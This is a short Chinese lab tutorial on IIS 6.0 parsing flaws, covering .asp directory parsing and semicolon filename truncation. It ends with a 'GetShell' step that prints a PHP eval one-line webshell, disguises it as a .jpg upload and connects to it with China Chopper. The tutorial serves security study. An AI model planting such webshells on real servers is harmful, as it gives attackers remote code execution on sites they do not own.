当前位置: 首页 > news >正文

IIS解析漏洞

一、目录解析

在网站下建立文件夹的名字为,asp或者.asa的文件夹,其目录内的任何扩展名的文件都被IIS当作asp文件来解析并执行。

启动Windows Server 2003 Enterprise Edition

打开默认网站,新建1.asp,在里面再新建1.txt,写入一段代码“<%=now%>”

使用物理机访问192.168.188.129/1.asp/1.txt

二、畸形文件解析

在IIS 6处理文件解析时,分号可以起到截断的效果。也就是说shell..asp;jpg会被服务器看成是shell.asp。另外lS 6.0默认的可执行文件除了asp还包含asa\cer\cdx

打开默认网站,新建1.asp;.jpg

使用物理机访问

三、GetShell

将PHP一句话木马写到shell.php并更改后缀为shell.jpg上传到目标站点利用解析漏洞进行访问

一句话木马

<?php @eval($_POST['pass']);?>

访问

用中国菜刀连接

 

相关文章:

  • 北京网站建设多少钱?
  • 辽宁网页制作哪家好_网站建设
  • 高端品牌网站建设_汉中网站制作
  • C++ bind复杂回调逻辑分析
  • LeetCode高频
  • Charles怎么修改参数
  • 擅于辩论的人可以将黑的说成白的,但是存在无法解决的矛盾
  • 【已解决】ERROR: No matching distribution found for torch.安装torch一次性解决方法
  • 【Python】正色表达式 - 验证罗马数字
  • [VS Code扩展]写一个代码片段管理插件(一):介绍与界面搭建
  • jdk和tomcat的环境配置以及使用nginx代理tomcat来实现负载均衡
  • 0064__管道 (进程间通信)
  • C++数据结构学习(顺序表)
  • 洛谷 P1868 饥饿的奶牛
  • 实现一个全栈模糊搜索匹配的功能
  • 时空预测又爆火了!新SOTA实现零样本精准预测
  • C语言《智能自平衡小车,实现平衡功能的基础上,加入了超声波避障、超声波跟随、蓝牙遥控等功能》+源代码+文档说明
  • MySQL —— 初始数据库
  • 《微软的软件测试之道》成书始末、出版宣告、补充致谢名单及相关信息
  • 2017 年终总结 —— 在路上
  • 2017前端实习生面试总结
  • ESLint简单操作
  • express.js的介绍及使用
  • PHP CLI应用的调试原理
  • redis学习笔记(三):列表、集合、有序集合
  • v-if和v-for连用出现的问题
  • vue和cordova项目整合打包,并实现vue调用android的相机的demo
  • vue中实现单选
  • 案例分享〡三拾众筹持续交付开发流程支撑创新业务
  • -- 查询加强-- 使用如何where子句进行筛选,% _ like的使用
  • 从0搭建SpringBoot的HelloWorld -- Java版本
  • 读懂package.json -- 依赖管理
  • 简单易用的leetcode开发测试工具(npm)
  • 聊聊springcloud的EurekaClientAutoConfiguration
  • 前端面试总结(at, md)
  • 提醒我喝水chrome插件开发指南
  • 用jquery写贪吃蛇
  • #微信小程序:微信小程序常见的配置传旨
  • (13)Hive调优——动态分区导致的小文件问题
  • (2024,Flag-DiT,文本引导的多模态生成,SR,统一的标记化,RoPE、RMSNorm 和流匹配)Lumina-T2X
  • (3)(3.5) 遥测无线电区域条例
  • (70min)字节暑假实习二面(已挂)
  • (C#)if (this == null)?你在逗我,this 怎么可能为 null!用 IL 编译和反编译看穿一切
  • (pt可视化)利用torch的make_grid进行张量可视化
  • (STM32笔记)九、RCC时钟树与时钟 第一部分
  • (六)软件测试分工
  • (切换多语言)vantUI+vue-i18n进行国际化配置及新增没有的语言包
  • (深入.Net平台的软件系统分层开发).第一章.上机练习.20170424
  • (十八)SpringBoot之发送QQ邮件
  • (十一)JAVA springboot ssm b2b2c多用户商城系统源码:服务网关Zuul高级篇
  • (原創) 如何安裝Linux版本的Quartus II? (SOC) (Quartus II) (Linux) (RedHat) (VirtualBox)
  • (原創) 物件導向與老子思想 (OO)
  • (转载)微软数据挖掘算法:Microsoft 时序算法(5)
  • .jks文件(JAVA KeyStore)
  • .Net Core中的内存缓存实现——Redis及MemoryCache(2个可选)方案的实现
  • .net 中viewstate的原理和使用
  • .NET连接数据库方式
  • .NET应用UI框架DevExpress XAF v24.1 - 可用性进一步增强